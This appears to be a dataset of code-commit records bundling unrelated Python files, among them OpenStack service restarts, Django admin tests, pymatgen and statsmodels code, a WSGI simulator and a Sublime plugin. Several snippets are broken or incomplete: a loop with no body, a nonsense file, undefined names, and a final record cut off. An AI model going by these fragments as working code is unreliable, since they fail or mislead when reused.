libvirt_enabled = os.system("systemctl -q is-enabled libvirtd.service")==0
nova_compute_enabled = os.system("systemctl -q is-enabled openstack-nova-compute.service")==0
openvswitch_agent_enabled = os.system("systemctl -q is-enabled quantum-openvswitch-agent.service")==0

print "enabled:"
print "    libvirtd=", libvirt_enabled
print "    openstack-nova-compute=", nova_compute_enabled
print "    quantum-openvswitch-agent=", openvswitch_agent_enabled

# Nothing to check unless the node is supposed to run all three services.
if (not libvirt_enabled) or (not nova_compute_enabled) or (not openvswitch_agent_enabled):
    print "services are not enabled. exiting"
    sys.exit(0)

libvirt_status = get_systemd_status("libvirtd.service")
nova_compute_status = get_systemd_status("openstack-nova-compute.service")
openvswitch_agent_status = get_systemd_status("quantum-openvswitch-agent.service")

print "status:"
print "    libvirtd=", libvirt_status
print "    openstack-nova-compute=", nova_compute_status
print "    quantum-openvswitch-agent=", openvswitch_agent_status

# If any unit has failed, stop everything and restart in dependency order
# (libvirt first, then the OVS agent, then nova-compute), pausing between
# starts to let each service come up.
if (libvirt_status=="failed") or (nova_compute_status=="failed") or (openvswitch_agent_status=="failed"):
    print "services have failed. doing the big restart"
    os.system("systemctl stop openstack-nova-compute.service")
    os.system("systemctl stop quantum-openvswitch-agent.service")
    os.system("systemctl stop libvirtd.service")
    time.sleep(5)
    os.system("systemctl start libvirtd.service")
    time.sleep(5)
    os.system("systemctl start quantum-openvswitch-agent.service")
    time.sleep(5)
    os.system("systemctl start openstack-nova-compute.service")

print "done"
| Python | 0 | |
0e5e3deb8a8250429ee7a1603e017343f6c7e3bb | Create a Testing Suite | tests/run_tests.py | tests/run_tests.py | from unittest import defaultTestLoader, TextTestRunner
import sys
# Discover every test under the current directory, run them verbosely, and
# exit non-zero on any failure so CI can detect it.
test_suite = defaultTestLoader.discover(start_dir=".")
run_result = TextTestRunner(verbosity=2, buffer=True).run(test_suite)
sys.exit(0 if run_result.wasSuccessful() else 1)
| Python | 0 | |
ecac8bc83491c9cb2312cf2a1c477c53c4832b4d | Add minimal dead code elimination | pykit/transform/dce.py | pykit/transform/dce.py | # -*- coding: utf-8 -*-
"""
Dead code elimination.
"""
from pykit.analysis import loop_detection
# Opcodes with no side effects: an op of one of these kinds may be deleted
# when nothing uses its result.
effect_free = set([
    'alloca', 'load', 'new_list', 'new_tuple', 'new_dict', 'new_set',
    'new_struct', 'new_data', 'new_exc', 'phi', 'exc_setup', 'exc_catch',
    'ptrload', 'ptrcast', 'ptr_isnull', 'getfield', 'getindex',
    'add', 'sub', 'mul', 'div', 'mod', 'lshift', 'rshift', 'bitand', 'bitor',
    'bitxor', 'invert', 'not_', 'uadd', 'usub', 'eq', 'noteq', 'lt', 'lte',
    'gt', 'gte', 'is_', 'addressof',
])

def dce(func, env=None):
    """
    Eliminate dead code.

    Single pass: deletes each effect-free op whose result has no uses.
    NOTE(review): one pass cannot remove chains of dead ops (an op whose only
    user is itself dead); running to a fixpoint would catch those.

    TODO: Prune branches, dead loops
    """
    for op in func.ops:
        if op.opcode in effect_free and len(func.uses[op]) == 0:
run = dce | Python | 0.000589 | |
2fa7855de542bb5ecd303e26d1e9913687478589 | Set up test suite to ensure server admin routes are added. | server/tests/test_admin.py | server/tests/test_admin.py | """General functional tests for the API endpoints."""
from django.test import TestCase, Client
# from django.urls import reverse
from rest_framework import status
from server.models import ApiKey, User
# from api.v2.tests.tools import SalAPITestCase
class AdminTest(TestCase):
    """Test the admin site is configured to have all expected views."""

    # Model slugs expected to be registered under /admin/server/.
    admin_endpoints = {
        'apikey', 'businessunit', 'condition', 'fact', 'historicalfact',
        'installedupdate', 'machinedetailplugin', 'machinegroup', 'machine',
        'pendingappleupdate', 'pendingupdate', 'pluginscriptrow',
        'pluginscriptsubmission', 'plugin', 'report', 'salsetting', 'updatehistoryitem',
        'updatehistory', 'userprofile'}

    def setUp(self):
        # Fresh client and a plain user (no profile set) for each test.
        self.client = Client()
        self.user = User.objects.create(username='test')

    def test_no_access(self):
        """Test that unauthenticated requests redirected to login."""
        for path in self.admin_endpoints:
            response = self.client.get('/admin/server/{}'.format(path))
            # Redirect to login page.
            self.assertEqual(response.status_code, status.HTTP_301_MOVED_PERMANENTLY)

    def test_ro_access(self):
        """Test that ro requests are rejected.

        RO users should not have access to the admin site (unless they have
        `is_staff = True`.
        """
        self.user.user_profile = 'RO'
        self.user.save()
        self.client.force_login(self.user)

        for path in self.admin_endpoints:
            url = '/admin/server/{}/'.format(path)
            response = self.client.get(url)
            msg = 'Failed for path: "{}"'.format(path)
            self.assertEqual(response.status_code, status.HTTP_302_FOUND, msg=msg)
            self.assertEqual(response.url, '/admin/login/?next=/admin/server/{}/'.format(path),
                             msg=msg)

    def test_ga_access(self):
        """Ensure GA userprofile grants admin page access."""
        self.user.user_profile = 'GA'
        self.user.save()
        self.client.force_login(self.user)

        for path in self.admin_endpoints:
            url = '/admin/server/{}/'.format(path)
            # follow=True so the final page after any redirect is asserted.
            response = self.client.get(url, follow=True)
            msg = 'Failed for path: "{}"'.format(path)
            self.assertEqual(response.status_code, status.HTTP_200_OK, msg=msg)
| Python | 0 | |
38b12d0581e82ebb0e4fee8500bbd5d83d373afa | Create wikipedia-link-analysis-reducer.py | wikipedia-link-analysis-reducer.py | wikipedia-link-analysis-reducer.py | Python | 0.000008 | ||
a2de972944f1aa990d81ccf9190866b327b552ed | Add xc.py | pymatgen/io/abinit/xc.py | pymatgen/io/abinit/xc.py | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
"""
from __future__ import unicode_literals, division, print_function
class XcFunctional(object):
    """
    https://wiki.fysik.dtu.dk/gpaw/setups/pawxml.html

    The xc_functional element defines the exchange-correlation functional used for
    generating the dataset. It has the two attributes type and name.

    The type attribute can be LDA, GGA, MGGA or HYB.
    The name attribute designates the exchange-correlation functional
    and can be specified in the following ways:

    [1] Taking the names from the LibXC library. The correlation and exchange names
        are stripped from their XC_ part and combined with a + sign. Here is an example for an LDA functional:

        <xc_functional type="LDA", name="LDA_X+LDA_C_PW"/>

        and this is what PBE will look like:

        <xc_functional type="GGA", name="GGA_X_PBE+GGA_C_PBE"/>

    [2] Using one of the following pre-defined aliases:

    type    name       LibXC equivalent             Reference
    LDA     PW         LDA_X+LDA_C_PW               LDA exchange; Perdew, Wang, PRB 45, 13244 (1992)
    GGA     PW91       GGA_X_PW91+GGA_C_PW91        Perdew et al PRB 46, 6671 (1992)
    GGA     PBE        GGA_X_PBE+GGA_C_PBE          Perdew, Burke, Ernzerhof, PRL 77, 3865 (1996)
    GGA     RPBE       GGA_X_RPBE+GGA_C_PBE         Hammer, Hansen, Nørskov, PRB 59, 7413 (1999)
    GGA     revPBE     GGA_X_PBE_R+GGA_C_PBE        Zhang, Yang, PRL 80, 890 (1998)
    GGA     PBEsol     GGA_X_PBE_SOL+GGA_C_PBE_SOL  Perdew et al, PRL 100, 136406 (2008)
    GGA     AM05       GGA_X_AM05+GGA_C_AM05        Armiento, Mattsson, PRB 72, 085108 (2005)
    GGA     BLYP       GGA_X_B88+GGA_C_LYP          Becke, PRA 38, 3098 (1988); Lee, Yang, Parr, PRB 37, 785

    For the Abinit conventions see: http://www.abinit.org/doc/helpfiles/for-v7.8/input_variables/varbas.html#ixc
    """
    from collections import namedtuple
    type_name = namedtuple("type_name", "stype, name")

    from pymatgen.io.abinit.libxc import LibxcEnum as xc
    # Pre-defined aliases: (exchange, correlation) -> (type, name).
    aliases = {
        (xc.LDA_X, xc.LDA_C_PW): type_name("LDA", "PW"),
        (xc.GGA_X_PW91, xc.GGA_C_PW91): type_name("GGA", "PW91"),
        (xc.GGA_X_PBE, xc.GGA_C_PBE): type_name("GGA", "PBE"),
        (xc.GGA_X_RPBE, xc.GGA_C_PBE): type_name("GGA", "RPBE"),
        (xc.GGA_X_PBE_R, xc.GGA_C_PBE): type_name("GGA", "revPBE"),
        (xc.GGA_X_PBE_SOL, xc.GGA_C_PBE_SOL): type_name("GGA", "PBEsol"),
        (xc.GGA_X_AM05, xc.GGA_C_AM05): type_name("GGA", "AM05"),
        (xc.GGA_X_B88, xc.GGA_C_LYP): type_name("GGA", "BLYP"),
    }

    @classmethod
    def from_abinit_ixc(cls, ixc_string):
        """Build XC from the value of the Abinit variable ixc (string)"""
        ixc = ixc_string.strip()
        if not ixc.startswith("-"):
            # NOTE(review): ``ixc2libxc`` is not defined in this module --
            # confirm where the positive-ixc mapping is meant to come from.
            return cls(**ixc2libxc[ixc])
        else:
            # libxc notation employed in Abinit: a six-digit number in the form XXXCCC or CCCXXX
            first, last = ixc[1:4], ixc[4:]
            # NOTE(review): the class imports LibxcEnum under the alias
            # ``xc``; this bare name would raise NameError here -- verify.
            x, c = LibxcEnum(first), LibxcEnum(last)
            if not x.is_xonly: # Swap
                x, c = c, x
            assert x.is_xonly and c.isconly
            return cls(x=x, c=c)

    #@classmethod
    #def from_type_name(cls, stype, name):

    def __init__(self, xc=None, x=None, c=None):
        """
        Either pass the full functional as ``xc``, or pass exchange ``x``
        and correlation ``c`` separately (both required in that case).

        :raises ValueError: if the arguments are inconsistent.
        """
        # Consistency check: exactly one of {xc} or {x and c} must be given.
        if xc is None:
            # Fixed: the original raised when BOTH x and c were supplied,
            # which is the valid case; it must raise when either is missing.
            if x is None or c is None:
                raise ValueError("x or c must be specified when xc is None")
        else:
            if x is not None or c is not None:
                raise ValueError("x and c should be None when xc is specified")

        self.xc, self.x, self.c = xc, x, c

    def __repr__(self):
        # Either the combined functional name, or "X+C".
        if self.xc is not None:
            return self.xc.name
        else:
            return "+".join([self.x.name, self.c.name])

    __str__ = __repr__

    # Equality and hashing are both based on the string form, keeping the
    # __eq__/__hash__ contract consistent.
    def __hash__(self):
        return hash(str(self))

    def __eq__(self, other):
        return str(self) == str(other)

    def __ne__(self, other):
        return not self == other

    #@property
    #def xtype(self):
    #    """Exchange family"""

    #@property
    #def xflavor(self):
    #    """Exchange flavor"""

    #@property
    #def ctype(self):
    #    """Correlation family"""
    #
    #@property
    #def cflavor(self):
    #    """Correlation flavor"""

    #@property
    #def info(self):
38f5c8534e3807d0485165017972adf47bd4aa2f | Create utils.py | utilities/utils.py | utilities/utils.py | from zope.interface import implements
from IOperation import IOperation
class Plus(object):
    """Utility component implementing IOperation: binary addition."""
    implements(IOperation)

    def __call__(self, a, b):
        # Delegate to the operands' own ``+`` semantics.
        return a + b
class Minus(object):
    """Utility component implementing IOperation: binary subtraction."""
    implements(IOperation)

    def __call__(self, a, b):
        # Delegate to the operands' own ``-`` semantics.
        return a - b
### alternative way to make utility component (using not class-adviser on class level -> using function classImplements)
# from zope.interface import classImplements
# classImplements(Host, IHost)
### also in Python 2.6 and later you can use class decorator @implementer(IFoo)
| Python | 0.000001 | |
7801f5a34fed9c50ebd0d426a69f875026da9602 | Create tutorial2.py | tutorial2.py | tutorial2.py | Python | 0 | ||
0ddac190019753d77b1ed78dcd49ad7370d666df | add some utils | python/irispy/utils.py | python/irispy/utils.py | import numpy as np
import irispy
def lcon_to_vert(A, b):
    """Convert the linear constraints ``A x <= b`` into vertices.

    :returns: array whose columns are the generator points of the polyhedron.
    """
    poly = irispy.Polyhedron(A.shape[1])
    poly.setA(A)
    poly.setB(b)
    V = np.vstack(poly.generatorPoints()).T
    # Fixed: the vertex array was computed but never returned, making the
    # function a no-op for callers.
    return V
def sample_convex_polytope(A, b, nsamples):
    """Draw ``nsamples`` uniform samples from {x : A x <= b} by rejection.

    :returns: array of shape (dim, nsamples), one sample per column.
    """
    poly = irispy.Polyhedron(A.shape[1])
    poly.setA(A)
    poly.setB(b)

    # Bounding box of the polytope, from its generator points.
    generators = np.vstack(poly.generatorPoints())
    lower = np.min(generators, axis=0)
    upper = np.max(generators, axis=0)

    samples = np.zeros((len(lower), nsamples))
    accepted = 0
    while accepted < nsamples:
        candidate = np.random.uniform(lower, upper)
        if np.all(poly.A.dot(candidate) <= poly.b):
            samples[:, accepted] = candidate
            accepted += 1
    return samples
538cd00a3c0307818cf62c61be3d91007a9b4091 | Add migration for movie.durations_in_s | migrations/versions/349d38252295_.py | migrations/versions/349d38252295_.py | """Add movie.duration_in_s
Revision ID: 349d38252295
Revises: 2b7f5e38dd73
Create Date: 2014-01-09 15:31:24.597000
"""
# revision identifiers, used by Alembic.
revision = '349d38252295'
down_revision = '2b7f5e38dd73'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply: add the nullable integer column ``duration_in_s`` to ``movie``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('movie', sa.Column('duration_in_s', sa.Integer(), nullable=True))
    ### end Alembic commands ###
def downgrade():
    """Revert: drop the ``duration_in_s`` column from ``movie``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('movie', 'duration_in_s')
    ### end Alembic commands ###
| Python | 0.000033 | |
98a4029c0e64b82fe4a416030e6338b28e00e999 | test remove_data and pickle, Logit still has fittedvalues | statsmodels/base/tests/test_shrink_pickle.py | statsmodels/base/tests/test_shrink_pickle.py | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 09 16:00:27 2012
Author: Josef Perktold
"""
import pickle
import numpy as np
import statsmodels.api as sm
from numpy.testing import assert_, assert_almost_equal, assert_equal
def check_pickle(obj):
    """Round-trip *obj* through pickle in memory.

    :returns: tuple (unpickled_object, pickle_length).
    """
    import StringIO
    fh = StringIO.StringIO()
    pickle.dump(obj, fh)
    # Fixed: use the standard file API tell() instead of the
    # StringIO-implementation-specific ``pos`` attribute.
    plen = fh.tell()
    fh.seek(0,0)
    res = pickle.load(fh)
    fh.close()
    return res, plen
class RemoveDataPickle(object):
    """Base checker: remove_data() keeps predict() working, and the pickled
    results stay small. Subclasses fit a model in __init__."""

    def __init__(self):
        # Extra keyword arguments forwarded to results.predict().
        self.predict_kwds = {}

    @classmethod
    def setupclass(self):
        # Shared random design matrix with a constant, and forecast points.
        nobs = 10000
        np.random.seed(987689)
        x = np.random.randn(nobs, 3)
        x = sm.add_constant(x, prepend=True)
        self.exog = x
        self.xf = 0.25 * np.ones((2,4))

    def test_remove_data_pickle(self):
        """Predictions must be unchanged after remove_data(), and the reduced
        pickle must stay under a size cap."""
        results = self.results
        xf = self.xf

        pred_kwds = self.predict_kwds
        pred1 = results.predict(xf, **pred_kwds)
        #create some cached attributes
        results.summary()

        #check pickle unpickle works on full results
        #TODO: drop of load save is tested
        res, l = check_pickle(results._results)

        #remove data arrays, check predict still works
        results.remove_data()
        pred2 = results.predict(xf, **pred_kwds)
        np.testing.assert_equal(pred2, pred1)

        #pickle, unpickle reduced array
        res, l = check_pickle(results._results)

        #for testing attach res
        self.res = res

        #Note: 10000 is just a guess for the limit on the length of the pickle
        assert_(l < 10000, msg='pickle length not %d < %d' % (l, 10000))

        pred3 = results.predict(xf, **pred_kwds)
        np.testing.assert_equal(pred3, pred1)
class TestRemoveDataPickleOLS(RemoveDataPickle):
    """remove_data/pickle checks for an OLS fit."""

    def __init__(self):
        # Fixed: super(self.__class__, ...) recurses infinitely if this class
        # is ever subclassed; name the class explicitly.
        super(TestRemoveDataPickleOLS, self).__init__()
        #fit for each test, because results will be changed by test
        x = self.exog
        np.random.seed(987689)
        y = x.sum(1) + np.random.randn(x.shape[0])
        self.results = sm.OLS(y, self.exog).fit()
class TestRemoveDataPicklePoisson(RemoveDataPickle):
    """remove_data/pickle checks for a Poisson fit."""

    def __init__(self):
        # Fixed: super(self.__class__, ...) recurses infinitely if this class
        # is ever subclassed; name the class explicitly.
        super(TestRemoveDataPicklePoisson, self).__init__()
        #fit for each test, because results will be changed by test
        x = self.exog
        np.random.seed(987689)
        y_count = np.random.poisson(np.exp(x.sum(1)-x.mean()))
        model = sm.Poisson(y_count, x)#, exposure=np.ones(nobs), offset=np.zeros(nobs)) #bug with default
        #use start_params to converge faster
        start_params = np.array([ 0.75334818,  0.99425553,  1.00494724,  1.00247112])
        self.results = model.fit(start_params=start_params, method='bfgs')

        #TODO: temporary, fixed in master
        self.predict_kwds = dict(exposure=1, offset=0)
        #TODO: needs to go into pickle save
        self.results.mle_settings['callback'] = None
class TestRemoveDataPickleLogit(RemoveDataPickle):
    """remove_data/pickle checks for a Logit fit."""

    def __init__(self):
        # Fixed: super(self.__class__, ...) recurses infinitely if this class
        # is ever subclassed; name the class explicitly.
        super(TestRemoveDataPickleLogit, self).__init__()
        #fit for each test, because results will be changed by test
        x = self.exog
        nobs = x.shape[0]
        np.random.seed(987689)
        y_bin = (np.random.rand(nobs) < 1./(1+np.exp(x.sum(1)-x.mean()))).astype(int)
        model = sm.Logit(y_bin, x)#, exposure=np.ones(nobs), offset=np.zeros(nobs)) #bug with default
        #use start_params to converge faster
        start_params = np.array([-0.73403806, -1.00901514, -0.97754543, -0.95648212])
        self.results = model.fit(start_params=start_params, method='bfgs')

        #TODO: needs to go into pickle save
        self.results.mle_settings['callback'] = None
if __name__ == '__main__':

    # Run every test class once when executed directly (nose-style setup).
    for cls in [TestRemoveDataPickleOLS, TestRemoveDataPicklePoisson,
                TestRemoveDataPickleLogit]:
        cls.setupclass()
        tt = cls()
        tt.test_remove_data_pickle()

    # NOTE(review): this bare ``raise`` always aborts here, so everything
    # below is dead scratch code; it also references names (results, xf, x,
    # sm) that are never defined in this scope. Consider deleting it.
    raise
    #print results.predict(xf)
    print results.model.predict(results.params, xf)
    results.summary()

    shrinkit = 1
    if shrinkit:
        results.remove_data()

    import pickle
    fname = 'try_shrink%d_ols.pickle' % shrinkit
    fh = open(fname, 'w')
    pickle.dump(results._results, fh) #pickling wrapper doesn't work
    fh.close()
    fh = open(fname, 'r')
    results2 = pickle.load(fh)
    fh.close()

    print results2.predict(xf)
    print results2.model.predict(results.params, xf)

    y_count = np.random.poisson(np.exp(x.sum(1)-x.mean()))
    model = sm.Poisson(y_count, x)#, exposure=np.ones(nobs), offset=np.zeros(nobs)) #bug with default
    results = model.fit(method='bfgs')

    results.summary()
    print results.model.predict(results.params, xf, exposure=1, offset=0)
    if shrinkit:
        results.remove_data()
    else:
        #work around pickling bug
        results.mle_settings['callback'] = None

    import pickle
    fname = 'try_shrink%d_poisson.pickle' % shrinkit
    fh = open(fname, 'w')
    pickle.dump(results._results, fh) #pickling wrapper doesn't work
    fh.close()
    fh = open(fname, 'r')
    results3 = pickle.load(fh)
    fh.close()

    print results3.predict(xf, exposure=1, offset=0)
    print results3.model.predict(results.params, xf, exposure=1, offset=0)
def check_pickle(obj):
    """Round-trip *obj* through pickle in memory.

    Duplicate of the helper defined earlier in this module.

    :returns: tuple (unpickled_object, pickle_length).
    """
    import StringIO
    fh = StringIO.StringIO()
    pickle.dump(obj, fh)
    # Fixed: use the standard file API tell() instead of the
    # StringIO-implementation-specific ``pos`` attribute.
    plen = fh.tell()
    fh.seek(0,0)
    res = pickle.load(fh)
    fh.close()
    return res, plen
def test_remove_data_pickle(results, xf):
    """Assert the pickled results stay small and predictions survive a
    pickle round-trip.

    NOTE(review): shadows the method of the same name above, and the call
    below references ``results``/``xf`` which are only bound inside the
    aborted __main__ block -- this looks like dead scratch code.
    """
    res, l = check_pickle(results)
    #Note: 10000 is just a guess for the limit on the length of the pickle
    np.testing.assert_(l < 10000, msg='pickle length not %d < %d' % (l, 10000))
    pred1 = results.predict(xf, exposure=1, offset=0)
    pred2 = res.predict(xf, exposure=1, offset=0)
    np.testing.assert_equal(pred2, pred1)

test_remove_data_pickle(results._results, xf)
| Python | 0 | |
25b95c058e7d2aa0eab8d67efd62858435bb4bec | Add the code to fully simulate a WSGI server. | train/wsgi.py | train/wsgi.py | # Copyright 2013 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import pprint
from turnstile import middleware
from train import util
LOG = logging.getLogger(__name__)
class Response(object):
"""
Accumulates a response from an application. The status code will
be in the ``status`` attribute, the headers will be normalized
(upper-case, with dashes converted to underscores) and represented
as a dictionary in the ``headers`` attribute, and the response
body will be stored in the ``body`` attribute.
"""
def __init__(self):
"""
Initialize a ``Response`` object.
"""
self.status = None
self.headers = {}
self.body = ''
def __call__(self, application, environ):
"""
Call the given application with the designated WSGI
environment. Returns the ``Response`` object.
:param application: A WSGI application.
:param environ: The WSGI environment for the request.
"""
# Call the application and consume its response
result = application(environ, self.start_response)
for data in result:
if data:
self.body += data
def start_response(self, status, response_headers, exc_info=None):
"""
The ``start_response`` callable passed as part of the WSGI
specification. No attempt is made to enforce the required
behavior; i.e., this version of ``start_response`` may be
called multiple times without error.
:param status: The status code.
:param response_headers: A list of tuples designating the
response headers and their values.
:param exc_info: Exception information that may be passed by
the application. Ignored.
:returns: Returns the ``write()`` method for compliance with
the WSGI specification.
"""
self.status = status
self.headers.update((k.upper().replace('-', '_'), v)
for k, v in response_headers)
return self.write
def write(self, data):
"""
The ``write`` callable returned by ``start_response()``.
Calling this method is deprecated, but this is supported by
the WSGI specification for backwards compatibility.
:param data: Data to be included in the response body.
"""
self.body += data
class TrainServer(object):
"""
Represents the fake server used to feed requests through the
Turnstile filter. Since the filter expects to be called with
another WSGI callable, this class also implements a fake
application which returns "200 OK" with an "X-Train-Server" header
(value "completed"). The body of the fake response will be the
pretty-printed WSGI environment dictionary.
"""
def __init__(self, filter):
"""
Initialize the ``TrainServer`` object.
:param filter: The Turnstile filter callable.
"""
self.application = filter(self.fake_app)
def __call__(self, environ):
"""
Process a request.
:param environ: The request, represented as a WSGI environment
dictionary. Turnstile will be called to
process the request.
:returns: A ``Response`` instance.
"""
response = Response()
response(self.application, environ)
return response
def fake_app(self, environ, start_response):
"""
Fake WSGI application. Since Turnstile is a filter, it needs
the next application in the pipeline to function properly;
this method acts as that fake application. It returns a "200
OK" response, with the "X-Train-Server" header set to
"completed". The input environment will be pretty-printed and
returned as the body of the response.
:param environ: The request environment.
:param start_response: A callable for starting the response.
:returns: A list of one element: the pretty-printed request
environment.
"""
start_response('200 OK', [('x-train-server', 'completed')])
return [pprint.pformat(environ)]
def start(self, queue):
"""
Read requests from the queue, process them, and log the
results.
:param queue: A queue object, implementing ``get()``.
"""
# Get our PID for logging purposes
pid = os.getpid()
while True:
environ = queue.get()
# Log the request
LOG.notice("%d: Processing request %s" %
(pid, pprint.pformat(environ)))
# Process the request
response = self(environ)
# Log the response
LOG.notice("%d: Response code %s; headers %s; body %s" %
(pid, response.status,
pprint.pformat(response.headers), response.body))
@classmethod
def from_confitems(cls, items):
"""
Construct a ``TrainServer`` object from the configuration
items.
:param items: A list of ``(key, value)`` tuples describing the
configuration to feed to the Turnstile middleware.
:returns: An instance of ``TrainServer``.
"""
local_conf = dict(items)
filter = middleware.turnstile_filter({}, **local_conf)
return cls(filter)
def start_workers(queue, items, workers=1):
"""
Start the train workers. Each worker pops requests off the queue,
passes them through Turnstile, and logs the result.
:param queue: A queue object, implementing ``get()``.
:param items: A list of ``(key, value)`` tuples describing the
configuration to feed to the Turnstile middleware.
:param workers: The number of workers to create.
:returns: A list of process IDs of the workers.
"""
# Generate the server object
train_server = TrainServer.from_confitems(items)
launcher = util.Launcher(train_server.start, queue)
servers = []
for worker in range(workers):
# Launch the server
servers.append(launcher.start())
return servers
| Python | 0 | |
c8ad60f23bc630ba8e57f735c8aa0ec7eeaa3c1f | teste ggj18 | arquivo3.py | arquivo3.py | dasdsa
sdas
sdasd
asdasdas
s
dasdas
das
d
asd
as
das
das
das
d
sad
| Python | 0.000001 | |
c5bbbe4f6430ef20da55ea0f8039091d4f79c491 | Add script to update taking for all team owners | sql/branch.py | sql/branch.py | import sys
from gratipay import wireup
from gratipay.models.participant import Participant
db = wireup.db(wireup.env())
teams = db.all("""
SELECT t.*::teams
FROM teams t
""")
for team in teams:
print("Updating team %s" % team.slug)
Participant.from_username(team.owner).update_taking()
print("Done!")
| Python | 0 | |
74c58436c28fbca804cd70a88ca1250ca22aa8e6 | add test_poll.py | tests/unit/concurrently/condor/test_poll.py | tests/unit/concurrently/condor/test_poll.py | # Tai Sakuma <tai.sakuma@gmail.com>
import os
import sys
import logging
import textwrap
import collections
import pytest
try:
import unittest.mock as mock
except ImportError:
import mock
from alphatwirl.concurrently import WorkingArea
from alphatwirl.concurrently import HTCondorJobSubmitter
##__________________________________________________________________||
@pytest.fixture()
def mock_proc_condor_q():
ret = mock.Mock()
ret.returncode = 0
return ret
@pytest.fixture()
def mock_pipe(monkeypatch):
ret = mock.Mock()
module = sys.modules['alphatwirl.concurrently.exec_util']
monkeypatch.setattr(module.subprocess, 'PIPE', ret)
return ret
@pytest.fixture()
def mock_popen(monkeypatch, mock_proc_condor_q):
ret = mock.Mock()
ret.side_effect = [mock_proc_condor_q]
module = sys.modules['alphatwirl.concurrently.exec_util']
monkeypatch.setattr(module.subprocess, 'Popen', ret)
return ret
@pytest.fixture()
def obj(mock_popen):
return HTCondorJobSubmitter()
##__________________________________________________________________||
def test_poll(
obj, mock_popen, mock_pipe,
mock_proc_condor_q, caplog):
obj.clusterprocids_outstanding = ['3764857.0', '3764858.0', '3764858.1', '3764858.2']
stdout = '\n'.join(['3764857.0 2', '3764858.1 2', '3764858.2 1'])
mock_proc_condor_q.communicate.return_value = (stdout, '')
with caplog.at_level(logging.DEBUG):
ret = obj.poll()
# assert 6 == len(caplog.records)
#
assert ['3764857.0', '3764858.1', '3764858.2'] == obj.clusterprocids_outstanding
#
expected = ['3764858.0']
assert expected == ret
#
expected = [
['condor_q', '3764857', '3764858', '-format', '%d.', 'ClusterId', '-format', '%d ', 'ProcId', '-format', '%-2s\n', 'JobStatus']
]
procargs_list = [args[0] for args, kwargs in mock_popen.call_args_list]
assert expected == procargs_list
##__________________________________________________________________||
| Python | 0.00002 | |
9967ade200639b584e379ec25030d1598071ffd3 | Create TextEditor.py | redactor/TextEditor.py | redactor/TextEditor.py | from tkinter import *
class TextEditor():
def __init__(self):
self.root = Tk()
self.root.wm_title("BrickText")
self.text_panel = Text(self.root)
self.text_panel.pack(side=RIGHT, fill=BOTH, expand=YES)
self.set_tabs()
def start(self):
self.root.mainloop()
def get_root(self):
return self.root
def get_text_panel(self):
return self.text_panel
def set_tabs(self):
f = font.Font(font=self.text_panel['font'])
tab_width = f.measure(' ' * 3)
self.text_panel.config(tabs=(tab_width,))
| Python | 0.000001 | |
c037412566b0a0313216e49168a8ebcc831e0f9b | add hamshahri information extractor | hamshahri.py | hamshahri.py |
from hazm import sent_tokenize, word_tokenize, Normalizer, HamshahriReader, POSTagger, DependencyParser
from InformationExtractor import InformationExtractor
hamshahri = HamshahriReader('/home/alireza/Corpora/Hamshahri')
normalizer = Normalizer()
tagger = POSTagger()
parser = DependencyParser(tagger=tagger)
extractor = InformationExtractor()
output = open('informations.txt', 'w')
for text in hamshahri.texts():
text = normalizer.normalize(text)
sentences = [word_tokenize(sentence) for sentence in sent_tokenize(text)]
tagged = tagger.batch_tag(sentences)
parsed = parser.tagged_batch_parse(tagged)
for sentence in parsed:
print('\n', '*', *[node['word'] for node in sentence.nodelist if node['word']], file=output)
for information in extractor.extract(sentence):
print(*information, sep=' - ', file=output)
break
| Python | 0.000008 | |
4e68a99a24439966b0001af2fe0ecf4eae5bd0bf | fix #185 - integrate with stagehand | stagehand.py | stagehand.py | # Copyright (c) 2014, Guillermo López-Anglada. Please see the AUTHORS file for details.
# All rights reserved. Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.)
import sublime
import sublime_plugin
import os
from subprocess import check_output
from Dart.lib.fs_completion import FileSystemCompletion
from Dart.lib.sublime import after
from Dart.lib.sdk import SDK
from Dart.lib.plat import supress_window
from Dart.lib.collections import CircularArray
class DartStagehandWizard(sublime_plugin.WindowCommand):
options = [
'consoleapp',
'package',
'polymerapp',
'shelfapp',
'webapp',
]
def run(self):
self.window.show_quick_panel(DartStagehandWizard.options,
self.on_done)
def on_done(self, i):
if i == -1:
return
template = DartStagehandWizard.options[i]
self.window.run_command('dart_stagehand', {'template': template})
class DartStagehand(sublime_plugin.WindowCommand):
cancel_change_event = False
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def run(self, template=None):
if not template:
return
self.template = template
view = self.window.show_input_panel('', '',
self.on_done,
self.on_change,
self.on_cancel)
view.settings().set('gutter', False)
view.settings().set('rulers', None)
view.settings().set('is_vintageous_widget', True)
view.set_syntax_file('Packages/Dart/Support/Dart (File System Navigation).hidden-tmLanguage')
path = os.path.expanduser('~')
v = self.window.active_view()
if v and v.file_name():
path = os.path.dirname(v.file_name())
view.run_command('append', {'characters': path + '/'})
view.sel().clear()
view.sel().add(sublime.Region(view.size()))
DartCompleteFs.user_interaction = False
def on_done(self, s):
DartCompleteFs.cache = None
DartCompleteFs.index = 0
DartCompleteFs.user_interaction = False
if not self.check_installed():
self.install()
self.template = None
return
self.generate(s, self.template)
self.template = None
def on_change(self, s):
if DartStagehand.cancel_change_event:
DartStagehand.cancel_change_event = False
return
DartCompleteFs.user_interaction = True
def on_cancel(self):
DartCompleteFs.cache = None
DartCompleteFs.index = 0
DartCompleteFs.user_interaction = False
self.template = None
def check_installed(self):
sdk = SDK()
out = check_output([sdk.path_to_pub, 'global', 'list'],
startupinfo=supress_window())
return 'stagehand' in out.decode('utf-8')
def install(self):
sdk = SDK()
self.window.run_command('dart_exec', {
'cmd' :[sdk.path_to_pub, 'global', 'activate', 'stagehand'],
'preamble': "Installing stagehand... (This may take a few seconds.)\n"
})
def generate(self, path=None, template=None):
assert path and template, 'wrong call'
sdk = SDK()
self.window.run_command('dart_exec', {
